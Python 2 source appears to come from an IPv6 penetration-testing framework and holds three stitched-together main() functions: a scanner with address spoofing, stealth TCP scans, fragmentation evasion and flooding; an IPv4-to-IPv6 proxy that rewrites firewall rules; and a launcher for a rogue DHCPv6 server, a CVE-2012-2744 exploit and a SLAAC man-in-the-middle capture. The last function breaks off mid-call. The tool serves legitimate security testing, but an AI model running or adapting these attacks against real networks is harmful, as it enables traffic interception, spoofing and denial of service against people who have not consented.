def main():
#LET'S PARSE THE ARGUMENTS FIRST
parser = argparse.ArgumentParser(version='0.8',description='An IPv6 port/network scanner. It can be combined with other modules of the framework.')
parser.add_argument('interface', action="store", help="the network interface to use.")
parser.add_argument('-gw','--gateway', action="store", dest="gateway", help="a gateway to use (only if required).")
parser.add_argument('-s', '--source', action="store", dest="source", default=False, help="the IPv6 address of the sender (if you want to spoof it).")
parser.add_argument('-rs', '--random-source', action="store_true", dest="random_source", default=False, help="randomise the IPv6 address of the sender (if you want to spoof it randomly).")
parser.add_argument('-m', '--mac', action="store", dest="mac_source", default=False, help="the mac address of the sender (if you want to spoof it).")
parser.add_argument('-tm', '--target_mac', action="store", dest="target_mac", default=False, help="the mac address of the target (if you want to define it to avoid Neighbor Solicitation).")
parser.add_argument('-rm', '--random-mac', action="store_true", dest="random_mac", default=False, help="randomise the MAC address of the sender (if you want to spoof it randomly).")
parser.add_argument('-iL', '--input_file', action="store", dest="input_file", help="the filename that includes the IPv6 address(es) of the target(s) - one per line")
parser.add_argument('-d', '--destination', action="store", dest="destination", help="the IPv6 address(es) of the target(s) - comma separated.")
parser.add_argument('-sM','--smart_scan', action="store_true", dest="smart_scan", default=False, help="perform a smart scan")
parser.add_argument('-pr', '--prefix', action="store", dest="prefix", default="fe80::", help="the IPv6 network prefix to use. Example: fe80:224:54ff:feba::")
parser.add_argument('-iC', '--input_combinations', action="store", dest="input_combinations", help="the filename where the combimations to use are stored")
parser.add_argument('-of', '--output_file', action="store", dest="output_file", help="the filename where the results will be stored.")
parser.add_argument('-dns','--dns_resolve', action="store", dest="dns", default="", help="Resolve a give hostname to its IPv6 address (if any). You can use a comma-separated list")
parser.add_argument('-dns-server','--dns_server', action="store", dest="dns_server", default="2001:470:20::2", help="the DNS server to use to resolve the hostnames to IPv6 address")
parser.add_argument('-nsol','--neighbor_solicitation', action="store_true", dest="nsol", default=False, help="Display neighbor solicitation results (IPv6 vs MAC addresses). Default: False")
parser.add_argument('-pmtu','--path_mtu_disovery', action="store_true", dest="pmtu", default=False, help="perform path MTU discovery.")
parser.add_argument('-mtu','--MTU', action="store", dest="dmtu", default=1500, help="The initial MTU to use for path MTU discovery.")
parser.add_argument('-rec','--passive_local_reconnaisance', action="store_true", dest="rec", default=False, help="ATTACK 1: Collects passively Neighbor/Router Solicitation/Advertisement Messages. Creates a list of IPv6 addresses / MAC addresses and various other IPv6 related information")
parser.add_argument('-mpn','--multicast_ping_scan', action="store_true", dest="mpn", default=False, help="perform a multicast link-local ping6 scan. Default operation if nothing else has been defined")
parser.add_argument('-sn','--ping_scan', action="store_true", dest="pn", default=False, help="perform a ping6 scan.")
parser.add_argument('-type','--icmpv6_type', action="store", dest="icmpv6_type", default=128, help="perform a ping6 scan.")
parser.add_argument('-code','--icmpv6_code', action="store", dest="icmpv6_code", default=0, help="perform a ping6 scan.")
parser.add_argument('-sS','--syn_scan', action="store_true", dest="sS", default=False, help="perform a SYN TCP scan (default)")
parser.add_argument('-sA','--ack_scan', action="store_true", dest="sA", default=False, help="perform an ACK TCP scan")
parser.add_argument('-sX','--xmas_scan', action="store_true", dest="sX", default=False, help="perform an XMAS TCP scan")
parser.add_argument('-sR','--reset_scan', action="store_true", dest="sR", default=False, help="perform a RESET TCP scan")
parser.add_argument('-sF','--fin_scan', action="store_true", dest="sF", default=False, help="perform a FIN TCP scan")
parser.add_argument('-sN','--null_scan', action="store_true", dest="sN", default=False, help="perform a NULL TCP scan")
parser.add_argument('-sU','--udp_scan', action="store_true", dest="sU", default=False, help="perform a UDP scan")
parser.add_argument('-tr-gr','--traceroute-graph', action="store_true", dest="tr_gr", default=False, help="perform TCP traceroute and produce a graph")
parser.add_argument('-tr','--traceroute', action="store_true", dest="tr_gen", default=False, help="perform generic traceroute (it can use ALL Chiron flexibilities)")
parser.add_argument('-max_ttl','--maximum_ttl', action="store", dest="maxttl", default=25, help="maximum ttl for traceroute")
parser.add_argument('-min_ttl','--minimum_ttl', action="store", dest="minttl", default=1, help="minimum ttl for traceroute")
parser.add_argument('-lfE','--list_fragmented_Extension_Headers', action="store", dest="lEf", default=False, help="Define an arbitrary list of Extension Headers which will be included in the fragmentable part")
parser.add_argument('-luE','--list_unfragmented_Extension_Headers', action="store", dest="lEu", default=False, help="Define an arbitrary list of Extension Headers which will be included in the unfragmentable part")
parser.add_argument('-hoplimit','--Hop_Limit', action="store", dest="hoplimit", default=64, help="The Hop Limit value of the IPv6 Header. Default: 64")
parser.add_argument('-nf','--no_of_fragments', action="store", dest="number_of_fragments", default=0, help="the number of fragments to send")
parser.add_argument('-lnh','--list_of_next_headers', action="store", dest="list_of_next_headers", default=False, help="the list of next headers to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)")
parser.add_argument('-lo','--list_of_offsets', action="store", dest="list_of_offsets", default=False, help="the list of offsets to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)")
parser.add_argument('-ll','--list_of_fragment_lengths', action="store", dest="list_of_fragment_lengths", default=False, help="the list of fragment lengths to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)")
parser.add_argument('-lm','--list_of_fragment_m_bits', action="store", dest="list_of_fragment_m_bits", default=False, help="the list of fragment M (More Fragments to Follow) bits to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)")
parser.add_argument('-id','--fragment_id', action="store", dest="fragment_id", default=-1, help="Fragment Identification number to be used in Fragment Extension Headers durign fragmentation.")
parser.add_argument('-seh','--size_of_extension_header', action="store", dest="size_of_extheaders", default=1, help="the size of the additional Extension Header (in octets of bytes)")
parser.add_argument('-l4','--layer4', action="store", dest="layer4", default="icmpv6", help="the layer4 protocol")
parser.add_argument('-l4_data','--layer4_payload', action="store", dest="l4_data", default="", help="the payload of layer4")
parser.add_argument('-p','--destination_port', action="store", dest="destport", default=False, help="destination port of a TCP or UDP scan. If not defined, ports 1-1024 will be scanned")
parser.add_argument('-stimeout','--sniffer_timeout', action="store", dest="sniffer_timeout", default=5, help="The timeout (in seconds) when the integrated sniffer (IF used) will exit automatically.")
parser.add_argument('-threads','--number_of_threads', action="store", dest="no_of_threads", default=1, help="The number of threads to use (for multi-threaded operation).")
parser.add_argument('-delay','--sending_delay', action="store", dest="delay", default=0, help="sending delay between two consecutive fragments")
parser.add_argument('-rh0','--route-type-0', action="store_true", dest="rh0", default=False, help="detect support of Type 0 Routing Headers")
parser.add_argument('-fl','--flood', action="store_true", dest="flood", default=0, help="flood the targets")
parser.add_argument('-fuzz','--fuzzing', action="store_true", dest="fuzz", default=0, help="fuzz the undefined fields of the IPv6 Extension Headers")
parser.add_argument('-flooding-interval','--interval-of-flooding', action="store", dest="flooding_interval", default=0.1, help="the interval between packets when flooding the targets")
parser.add_argument('-ftimeout','--flooding_timeout', action="store", dest="flooding_timeout", default=200, help="The time (in seconds) to flood your target.")
values = parser.parse_args()
###LETS DO SOME CHECKS FIRST TO SEE IF WE CAN WORK###
if os.geteuid() != 0:
print "You must be root to run this script."
exit(1)
#Define the default behaviour: Multi-ping scan
if (not values.rec) and (not values.pn) and (not values.pmtu) and (not values.mpn) and (not values.nsol) and (not values.sS) and (not values.sX) and (not values.sA) and (not values.sN) and (not values.sR) and (not values.sF) and (not values.sU) and (not values.tr_gr) and (not values.tr_gen) and (not values.rh0) and (not values.dns):
values.mpn=True
scapy.config.conf.verb=0
#GET YOUR SOURCE IPV6 AND MAC ADDRESS
mac_source=definitions.define_source_mac_address(values.mac_source,values.random_mac)
source_ip,mac_source= definitions.define_source_ipv6_address(values.source,mac_source,values.interface,values.random_source,values.prefix)
###START SNIFFING###
q = multiprocessing.Queue()
pr=None
if values.rec or values.mpn:
myfilter = "ip6"
elif values.pn:
myfilter = "ip6 and dst " + source_ip + " and icmp6"
elif values.rh0:
myfilter = "ip6 and dst " + source_ip + " and src " + source_ip + " and not host " + values.dns_server
else:
myfilter = "ip6 and dst " + source_ip + " and not host " + values.dns_server
if values.rec:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 1, packets_sent_list,q,float(values.sniffer_timeout),))
elif values.mpn:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 5, packets_sent_list,q,float(values.sniffer_timeout),))
elif values.pn:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 2, packets_sent_list,q,float(values.sniffer_timeout),))
elif values.sS or values.sA or values.sX or values.sR or values.sF or values.sN:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 3, packets_sent_list,q,float(values.sniffer_timeout),))
elif values.sU:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 4, packets_sent_list,q,float(values.sniffer_timeout),))
elif values.tr_gen:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 6, packets_sent_list,q,float(values.sniffer_timeout),))
elif values.rh0:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 7, packets_sent_list,q,float(values.sniffer_timeout),))
elif not values.pmtu:
pr = multiprocessing.Process(target=sniffer_process.mySniffer, args=(myfilter, values.interface, 0, packets_sent_list,q,float(values.sniffer_timeout),))
if not values.pmtu: #IN THIS CASE SNIFFER IS NOT REQUIRED BECAUSE WE USE THE SEND/RECEIVE FUNCTIONS OF SCAPY
pr.daemon = True
pr.start()
time.sleep(1) #to make sure than sniffer has started before we proceed, otherwise you may miss some traffic
###THE ATTACKS WILL FOLLOW NOW###
if values.rec:
try:
time.sleep(float(values.sniffer_timeout))
except KeyboardInterrupt:
print "\n\nExiting on user's request..."
print_scanning_results(values,q,source_ip)
exit(1)
print_scanning_results(values,q,source_ip)
elif values.mpn:
scanners.multi_ping_scanner(source_ip,values.interface, float(values.sniffer_timeout),values.flood, values.flooding_interval)
time.sleep(1) #to make sure than sniffer has ended
if pr:
try:
pr.join()
except KeyboardInterrupt:
print 'Received Ctrl-C'
alive_results(q,source_ip,values.output_file)
sys.exit(1)
alive_results(q,source_ip,values.output_file)
elif values.dns:
ip_list,IPv6_scope_defined = definitions.define_destinations(values.dns_server,values.input_file,values.smart_scan,values.prefix,values.input_combinations)
gw_mac = auxiliary_functions.get_gw_mac(values.gateway,values.interface,ip_list,source_ip)
#Check if DNS resolution is what it is asked for
fqdn_list = values.dns.split(",")
for f in fqdn_list:
if checkip.is_valid_host(f):
resolved_ipv6_address=scanners.dns_resolve_ipv6_addr(source_ip,f, values.dns_server,gw_mac,values.interface)
if resolved_ipv6_address:
print f,resolved_ipv6_address
else:
print "Not a valid Full Qualified Domain Name"
exit(1)
else: ###ATTACKS THAT REQUIRE THE DEFINITION OF DESTINATION(S)-TARGETS###
ip_list,IPv6_scope_defined = definitions.define_destinations(values.destination,values.input_file,values.smart_scan,values.prefix,values.input_combinations)
gw_mac = auxiliary_functions.get_gw_mac(values.gateway,values.interface,ip_list,source_ip)
#check if fragmentation parameters are OK
list_of_fragment_lengths,list_of_offsets,list_of_fragment_m_bits,list_of_next_headers=checkings.check_fragmentation_parameters(values.list_of_fragment_lengths,values.list_of_offsets,values.list_of_fragment_m_bits,values.list_of_next_headers,values.number_of_fragments)
###TRACEROUTE GRAPH
if values.tr_gr:
ans,unans=scapy.layers.inet6.traceroute6(ip_list)
print ans.display()
if values.destination:
filename="> ./"+values.destination+".svg"
else:
filename="traceroure_graph_results_of_file"+values.input_file+".svg"
filename=filename.replace('/', '.')
filename=">./"+filename
filename=filename.replace(':', '.')
ans.graph(target=filename)
print "Graph is saved at",filename.strip('>')
exit(1)
###DEFINE THE DESTINATION PORTS
destports=""
if values.sS or values.sA or values.sX or values.sR or values.sF or values.sN or values.sU:
if values.destport:
portlist = []
if values.destport.find('-')!=-1 : #if found
ports=values.destport.split(',')
for p in ports:
if p.find('-')!=-1:
portragne = p.split('-')
for r in xrange(int(portragne[0]), int(portragne[1]) + 1):
portlist.append(str(r))
else:
portlist.append(p)
destports = ','.join(portlist)
else:
destports=values.destport
else:
if values.sS or values.sA or values.sX or values.sR or values.sF or values.sN:
portlist=fileio.read_ports_to_scan("tcp")
else:
portlist=fileio.read_ports_to_scan("udp")
if not portlist:
portlist=[str(x) for x in range(1,1025)]
destports = ','.join(portlist)
###LET'S DO THE JOB NOW
queue = Queue.Queue()
print "Let's start scanning"
print "Press Ctrl-C to terminate before finishing"
if not destports:
destports="-1"
for d in ip_list:
for p in destports.split(","):
queue.put([str(d),int(p)])
for i in xrange(1, int(values.no_of_threads)+1) :
pr2 = multiprocessing.Process(target=Worker, args=(values,source_ip,mac_source,list_of_next_headers,list_of_offsets,list_of_fragment_lengths,list_of_fragment_m_bits,gw_mac,queue,IPv6_scope_defined,packets_sent_list,i,))
pr2.daemon = True
pr2.start()
pr2.join()
#print "Worker %d Created!"%i
if pr:
try:
pr.join()
except KeyboardInterrupt:
print "Exiting on user's request..."
print_scanning_results(values,q,source_ip)
exit(1)
print_scanning_results(values,q,source_ip)
def main():
#LET'S PARSE THE ARGUMENTS FIRST
parser = argparse.ArgumentParser(version='0.9',
description='An IPv6 tool.')
parser.add_argument('ipv6interface',
action="store",
help="the IPv6 network interface to use.")
parser.add_argument('ipv4interface',
action="store",
help="the IPv4 network interface to use.")
parser.add_argument('ipv4_sender',
action="store",
help="the ipv4 address of the initial sender")
parser.add_argument('ipv4_receiver',
action="store",
help="the ipv4 address where the proxy listens to")
parser.add_argument('-l4_data',
'--layer4_payload',
action="store",
dest="l4_data",
default="",
help="the payload of layer4")
parser.add_argument('-gw',
'--gateway',
action="store",
dest="gateway",
help="a gateway to use (only if required).")
parser.add_argument(
'-s',
'--source',
action="store",
dest="source",
default=False,
help="the IPv6 address of the sender (if you want to spoof it).")
parser.add_argument(
'-rs',
'--random-source',
action="store_true",
dest="random_source",
default=False,
help=
"randomise the IPv6 address of the sender (if you want to spoof it randomly)."
)
parser.add_argument(
'-m',
'--mac',
action="store",
dest="mac_source",
default=False,
help="the mac address of the sender (if you want to spoof it).")
parser.add_argument(
'-tm',
'--target_mac',
action="store",
dest="target_mac",
default=False,
help=
"the mac address of the target (if you want to define it to avoid Neighbor Solicitation)."
)
parser.add_argument(
'-rm',
'--random-mac',
action="store_true",
dest="random_mac",
default=False,
help=
"randomise the MAC address of the sender (if you want to spoof it randomly)."
)
parser.add_argument(
'-d',
'--destination',
action="store",
dest="destination",
help=
"the IPv6 address of the target. Just one target, not a list as in the other modules of the framework. "
)
parser.add_argument(
'-dns-server',
'--dns_server',
action="store",
dest="dns_server",
default="2001:470:20::2",
help="the DNS server to use to resolve the hostnames to IPv6 address")
parser.add_argument(
'-lfE',
'--list_fragmented_Extension_Headers',
action="store",
dest="lEf",
default=False,
help=
"Define an arbitrary list of Extension Headers which will be included in the fragmentable part"
)
parser.add_argument(
'-luE',
'--list_unfragmented_Extension_Headers',
action="store",
dest="lEu",
default=False,
help=
"Define an arbitrary list of Extension Headers which will be included in the unfragmentable part"
)
parser.add_argument(
'-hoplimit',
'--Hop_Limit',
action="store",
dest="hoplimit",
default=255,
help="The Hop Limit value of the IPv6 Header. Default: 255.")
parser.add_argument('-nf',
'--no_of_fragments',
action="store",
dest="number_of_fragments",
default=0,
help="the number of fragments to send")
parser.add_argument(
'-lnh',
'--list_of_next_headers',
action="store",
dest="list_of_next_headers",
default=False,
help=
"the list of next headers to be used in the Fragment Headers, comma_separated"
)
parser.add_argument(
'-lo',
'--list_of_offsets',
action="store",
dest="list_of_offsets",
default=False,
help=
"the list of offsets to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)"
)
parser.add_argument(
'-ll',
'--list_of_fragment_lengths',
action="store",
dest="list_of_fragment_lengths",
default=False,
help=
"the list of fragment lengths to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)"
)
parser.add_argument(
'-lm',
'--list_of_fragment_m_bits',
action="store",
dest="list_of_fragment_m_bits",
default=False,
help=
"the list of fragment M (More Fragments to Follow) bits to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)"
)
parser.add_argument(
'-id',
'--fragment_id',
action="store",
dest="fragment_id",
default=-1,
help=
"Fragment Identification number to be used in Fragment Extension Headers durign fragmentation."
)
parser.add_argument('-delay',
'--sending_delay',
action="store",
dest="delay",
default=0,
help="sending delay between two consecutive fragments")
parser.add_argument(
'-seh',
'--size_of_extension_header',
action="store",
dest="size_of_extheaders",
default=1,
help="the size of the additional Extension Header (in octets of bytes)"
)
parser.add_argument(
'-stimeout',
'--sniffer_timeout',
action="store",
dest="sniffer_timeout",
default=60,
help=
"The timeout (in seconds) when the integrated sniffer (IF used) will exit automatically."
)
parser.add_argument(
'-threads',
'--number_of_threads',
action="store",
dest="no_of_threads",
default=10,
help="The number of threads to use (for multi-threaded operation).")
values = parser.parse_args()
###LETS TO SOME CHECKS FIRST TO SEE IF WE CAN WORK###
if os.geteuid() != 0:
print "You must be root to run this script."
exit(1)
scapy.config.conf.verb = 0
scapy.config.conf.L3socket = scapy.supersocket.L3RawSocket
#GET YOUR SOURCE IPV6 AND MAC ADDRESS
mac_source = definitions.define_source_mac_address(values.mac_source,
values.random_mac)
source_ip, mac_source = definitions.define_source_ipv6_address(
values.source, mac_source, values.ipv6interface, values.random_source,
False)
#DEFINE DESTINATIONS AND GATEWAY MAC
ip_list, IPv6_scope_defined = definitions.define_destinations(
values.destination, False, False, False, False)
gw_mac = auxiliary_functions.get_gw_mac(values.gateway,
values.ipv6interface, ip_list,
source_ip)
#CONFIGURE IPTABLES
if platform.system() == "Linux":
#output = subprocess.check_output(['ps', '-A'])
#if 'firewalld' in output:
# print("firewalld is up an running!")
subprocess.call([
'ip6tables', '-I', 'OUTPUT', '1', '-p', 'icmpv6', '--icmpv6-type',
'destination-unreachable', '-s', source_ip, '-d',
values.destination, '-j', 'DROP'
])
subprocess.call([
'iptables', '-I', 'OUTPUT', '1', '--source', '127.0.0.3',
'--destination', '127.0.0.1', '-p', 'tcp', '--tcp-flags', 'RST',
'RST', '-j', 'DROP'
])
subprocess.call([
'ip6tables', '-I', 'OUTPUT', '1', '-p', 'tcp', '-s', source_ip,
'-d', values.destination, '-j', 'DROP'
])
else:
print "This is not a Linux system. You must configure the firewall on your own"
dest = ip_list[
0] #Use just the 1st address, if more than one is provided. No reason for many targets addresses in the proxy
###CHECK THE VALIDITY OF THE IP DESTINATION ADDRESSES###
###DO THESE CHECKS ONLY FOR THE CASES REQUIRED###
resolved_ipv6_address = ""
if checkip.is_valid_host(dest):
resolved_ipv6_address = dns_resolve_ipv6_addr(dest, values.dns_server)
if resolved_ipv6_address:
dest = resolved_ipv6_address[
0] #get and check just the first address, alternative option below
if checkip.is_valid_ipv6(dest):
if dest == "ff02::1":
ether_dst = "33:33:00:00:00:01"
elif values.gateway:
ether_dst = gw_mac
elif values.target_mac:
ether_dst = values.target_mac
else:
ether_dst = auxiliary_functions.find_single_mac(
source_ip, dest, values.ipv6interface)
if not ether_dst:
p = scapy.layers.inet6.conf.route6.route("::/0")
ether_dst = auxiliary_functions.find_single_mac(p[1], p[2], p[0])
if not ether_dst:
print dest, "not found"
exit(0)
if checkip.is_valid_host(dest):
res_str = dest + " could not be resolved"
else:
res_str = dest + " is not a valid IPv6 address"
list_of_fragment_lengths, list_of_offsets, list_of_fragment_m_bits, list_of_next_headers = checkings.check_fragmentation_parameters(
values.list_of_fragment_lengths, values.list_of_offsets,
values.list_of_fragment_m_bits, values.list_of_next_headers,
values.number_of_fragments)
unfragmentable_part, size_of_unfragmentable_part = create_extension_headers_chain.create_unfragmentable_part(
source_ip, dest, int(values.hoplimit), values.lEu,
int(values.size_of_extheaders), 0)
fragmentable_extension_headers, size_of_fragmentable_extension_headers, first_next_header_value = create_extension_headers_chain.create_fragmentable_part(
values.lEf, int(values.size_of_extheaders), 0)
list_of_fragment_lengths, list_of_offsets, list_of_fragment_m_bits, list_of_next_headers = checkings.check_fragmentation_parameters(
values.list_of_fragment_lengths, values.list_of_offsets,
values.list_of_fragment_m_bits, values.list_of_next_headers,
values.number_of_fragments)
myfilter = "ip6 and src " + dest + " and dst " + source_ip #"src " + values.ipv4_sender + " and dst " + values.ipv4_receiver
pr = multiprocessing.Process(target=IPv6_to_IPv4_Worker,
args=(
myfilter,
values.ipv4_receiver,
values.ipv4_sender,
values.ipv6interface,
))
pr.daemon = True
pr.start()
queueIPv4 = multiprocessing.Queue()
myfilter = "src " + values.ipv4_sender + " and dst " + values.ipv4_receiver
pr2 = multiprocessing.Process(target=IPv4Sniffer,
args=(
queueIPv4,
myfilter,
values.ipv4interface,
))
pr2.daemon = True
pr2.start()
IPv6SenderProcesses = []
for i in xrange(1, int(values.no_of_threads) + 1):
print "IPv6 Sender Process ", i
IPv6SenderProcesses.append(
multiprocessing.Process(target=IPv6Sender,
args=(
values,
queueIPv4,
i,
mac_source,
source_ip,
dest,
ether_dst,
values.ipv6interface,
list_of_fragment_lengths,
list_of_offsets,
list_of_fragment_m_bits,
list_of_next_headers,
fragmentable_extension_headers,
size_of_fragmentable_extension_headers,
first_next_header_value,
unfragmentable_part,
size_of_unfragmentable_part,
values.number_of_fragments,
)))
IPv6SenderProcesses[i - 1].daemon = True
IPv6SenderProcesses[i - 1].start()
try:
pr.join()
pr2.join()
for i in xrange(1, int(values.no_of_threads) + 1):
IPv6SenderProcesses[i - 1].join()
print "Worker %d Created!" % i
except KeyboardInterrupt:
print 'Received Ctrl-C'
#RECONFIGURE IPTABLES
if platform.system() == "Linux":
print "Reconfigure ip(6)tables to the old state"
subprocess.call(['ip6tables', '-D', 'OUTPUT', '1'])
subprocess.call(['iptables', '-D', 'OUTPUT', '1'])
subprocess.call(['ip6tables', '-D', 'OUTPUT', '1'])
print "DONE"
exit(0)
def main():
#LET'S PARSE THE ARGUMENTS FIRST
parser = argparse.ArgumentParser(
version='0.8',
description=
'An IPv6 neighbor discovery packet tool with enhanced capabilities and flexibility.'
)
parser.add_argument('interface',
action="store",
help="the network interface to use.")
parser.add_argument('-gw',
'--gateway',
action="store",
dest="gateway",
help="a gateway to use (only if required).")
parser.add_argument(
'-s',
'--source',
action="store",
dest="source",
default=False,
help="the IPv6 address of the sender (if you want to spoof it).")
parser.add_argument(
'-d',
'--destination',
action="store",
dest="destination",
help="the IPv6 address(es) of the target(s) - comma separated.")
parser.add_argument(
'-rs',
'--random-source',
action="store_true",
dest="random_source",
default=False,
help=
"randomise the IPv6 address of the sender (if you want to spoof it randomly)."
)
parser.add_argument(
'-m',
'--mac',
action="store",
dest="mac_source",
default=False,
help="the mac address of the sender (if you want to spoof it).")
parser.add_argument(
'-tm',
'--target_mac',
action="store",
dest="target_mac",
default=False,
help=
"the mac address of the target (if you want to define it to avoid Neighbor Solicitation)."
)
parser.add_argument(
'-rm',
'--random-mac',
action="store_true",
dest="random_mac",
default=False,
help=
"randomise the MAC address of the sender (if you want to spoof it randomly)."
)
parser.add_argument(
'-pr',
'--prefix',
action="store",
dest="prefix",
default="fe80::",
help="the IPv6 network prefix to use. Example: fe80:224:54ff:feba::")
parser.add_argument(
'-lfE',
'--list_fragmented_Extension_Headers',
action="store",
dest="lEf",
default=False,
help=
"Define an arbitrary list of Extension Headers which will be included in the fragmentable part"
)
parser.add_argument(
'-luE',
'--list_unfragmented_Extension_Headers',
action="store",
dest="lEu",
default=False,
help=
"Define an arbitrary list of Extension Headers which will be included in the unfragmentable part"
)
parser.add_argument(
'-hoplimit',
'--Hop_Limit',
action="store",
dest="hoplimit",
default=False,
help=
"The Hop Limit value of the IPv6 Header. Default: 255 (for MLD, default=1)."
)
parser.add_argument('-nf',
'--no_of_fragments',
action="store",
dest="number_of_fragments",
default=0,
help="the number of fragments to send")
parser.add_argument(
'-lnh',
'--list_of_next_headers',
action="store",
dest="list_of_next_headers",
default=False,
help=
"the list of next headers to be used in the Fragment Headers, comma_separated"
)
parser.add_argument(
'-lo',
'--list_of_offsets',
action="store",
dest="list_of_offsets",
default=False,
help=
"the list of offsets to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)"
)
parser.add_argument(
'-ll',
'--list_of_fragment_lengths',
action="store",
dest="list_of_fragment_lengths",
default=False,
help=
"the list of fragment lengths to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)"
)
parser.add_argument(
'-lm',
'--list_of_fragment_m_bits',
action="store",
dest="list_of_fragment_m_bits",
default=False,
help=
"the list of fragment M (More Fragments to Follow) bits to be used in the Fragment Headers when fragmentation takes place, comma_separated (optional)"
)
parser.add_argument(
'-seh',
'--size_of_extension_header',
action="store",
dest="size_of_extheaders",
default=1,
help="the size of the additional Extension Header (in octets of bytes)"
)
parser.add_argument('-l4',
'--layer4',
action="store",
dest="layer4",
default="icmpv6",
help="the layer4 protocol")
parser.add_argument('-l4_data',
'--layer4_payload',
action="store",
dest="l4_data",
default="",
help="the payload of layer4")
parser.add_argument('-dhcpv6_server',
'--dhcpv6-server',
action="store_true",
dest="dhcpv6_server",
default=False,
help="DHCPv6 service operation")
parser.add_argument('-dhcpv6_preference',
'--dhcpv6_preference',
action="store",
dest="dhcpv6_preference",
default=255,
help="Preference of the DHCPv6 Server")
parser.add_argument('-dhcpv6_prefered_lft',
'--dhcpv6_prefered_lft',
action="store",
dest="dhcpv6_prefered_lft",
default=375,
help="Prefered lifetime of the DHCPv6 Server")
parser.add_argument('-dhcpv6_valid_lft',
'--dhcpv6_valid_lft',
action="store",
dest="dhcpv6_valid_lft",
default=600,
help="Valid lifetime of the DHCPv6 Server")
parser.add_argument('-dhcpv6_DNS_Domain_name',
'--dhcpv6_DNS_Domain_name',
action="store",
dest="dhcpv6_DNS_Domain_name",
default="mylab.example",
help="DNS Domain name of the DHCPv6 Server")
parser.add_argument('-dhcpv6_DNS_Server',
'--dhcpv6_DNS_Server',
action="store",
dest="dhcpv6_DNS_Server",
default="2001:db8:1:1::1000",
help="DNS Server provided by the DHCPv6 Server")
parser.add_argument('-CVE_2012_2744',
'--CVE_2012_2744',
action="store_true",
dest="CVE_2012_2744",
default=False,
help="CVE 2012-2744 Exploitation")
parser.add_argument('-mitm',
'--slaac_mitm',
action="store_true",
dest="mitm",
default=False,
help="Man in the Middle Attack Using SLAAC Attack")
parser.add_argument(
'-mitm_pcap',
'--mitim_pcap_file',
action="store",
dest="mitm_pcap",
default="/tmp/mitm.pcap",
help=
"pcap file where the traffic captured using the MITM attack will be stored."
)
#print "Usage: program.py <your_ipv6_address> <targets_comma_separated> <iface> <pcap_file_to_write_captured_traffic>"
values = parser.parse_args()
###LETS TO SOME CHECKS FIRST TO SEE IF WE CAN WORK###
if os.geteuid() != 0:
print "You must be root to run this script."
exit(1)
if (not values.dhcpv6_server and not values.CVE_2012_2744
and not values.mitm):
print "Please tell me what you want me to do"
exit(0)
#scapy.config.conf.verb=0
scapy.layers.inet6.conf.verb = 0
myinterface = values.interface
#GET YOUR SOURCE IPV6 AND MAC ADDRESS
mac_source = definitions.define_source_mac_address(values.mac_source,
values.random_mac)
source_ip, mac_source = definitions.define_source_ipv6_address(
values.source, mac_source, values.interface, values.random_source,
values.prefix)
print "Source MAC address", mac_source, "Source IPv6 Address", source_ip
if values.dhcpv6_server:
#check if fragmentation parameters are OK
list_of_fragment_lengths, list_of_offsets, list_of_fragment_m_bits, list_of_next_headers = checkings.check_fragmentation_parameters(
values.list_of_fragment_lengths, values.list_of_offsets,
values.list_of_fragment_m_bits, values.list_of_next_headers,
values.number_of_fragments)
list_of_unfragmented_ext_headers = []
list_of_fragmented_ext_headers = []
if values.lEu:
list_of_unfrag_ext_headers = create_extension_headers_chain.make_list_of_ext_headers(
values.lEu)
list_of_unfragmented_ext_headers = create_extension_headers_chain.identify_parameters(
list_of_unfrag_ext_headers)
if values.lEf:
list_of_frag_ext_headers = create_extension_headers_chain.make_list_of_ext_headers(
values.lEf)
list_of_fragmented_ext_headers = create_extension_headers_chain.identify_parameters(
list_of_frag_ext_headers)
fragmentable_extension_headers, size_of_fragmentable_extension_headers, first_next_header_value = create_extension_headers_chain.create_fragmentable_part(
values.lEf, int(values.size_of_extheaders), 0)
print "Starting sniffing..."
myfilter = "ip6"
print "Sniffer filter is", myfilter
s = scapy.config.conf.L2socket(iface=myinterface) # Open Socket Once
dhcpv6attack = DHCPv6Attack(
myfilter, values.interface, mac_source, source_ip,
values.dhcpv6_preference, values.dhcpv6_prefered_lft,
values.dhcpv6_valid_lft, values.dhcpv6_DNS_Domain_name,
values.dhcpv6_DNS_Server, list_of_unfragmented_ext_headers,
list_of_fragmented_ext_headers, values.size_of_extheaders,
values.number_of_fragments, list_of_next_headers, list_of_offsets,
list_of_fragment_lengths, list_of_fragment_m_bits, values.prefix,
int(values.hoplimit), values.lEu, first_next_header_value,
fragmentable_extension_headers,
size_of_fragmentable_extension_headers, s)
dhcpv6attack.run()
#sniff(filter=myfilter, iface=values.interface, prn=handler, store=0)
elif values.CVE_2012_2744:
if not values.destination:
print "You must define your target (destination)"
exit(0)
else:
addr6 = ipaddr.IPAddress(values.destination)
myaddr = addr6.exploded
if myaddr[0:2] == "ff":
if int(myaddr[2]) >= 0 and int(myaddr[2]) < 8:
ether_dst = "33:33:" + myaddr[30:32] + ":" + myaddr[
32:37] + ":" + myaddr[37:39]
elif values.gateway:
ether_dst = auxiliary_functions.find_single_mac(
source_ip, values.gateway, values.interface)
else:
if values.target_mac:
ether_dst = values.target_mac
else:
ether_dst = auxiliary_functions.find_single_mac(
source_ip, myaddr, values.interface)
if not ether_dst:
print "Destination was not found. Please consider defining a gateway, if needed."
print "Destination MAC address", ether_dst, "Destination IPv6 Address", values.destination
attacks.CVE_2012_2744(values.interface, mac_source, source_ip,
values.destination, ether_dst)
elif values.mitm:
file_to_write = values.mitm_pcap
ip_list = values.destination.split(",")
victims = attacks.find_mac_using_spoofed_source(
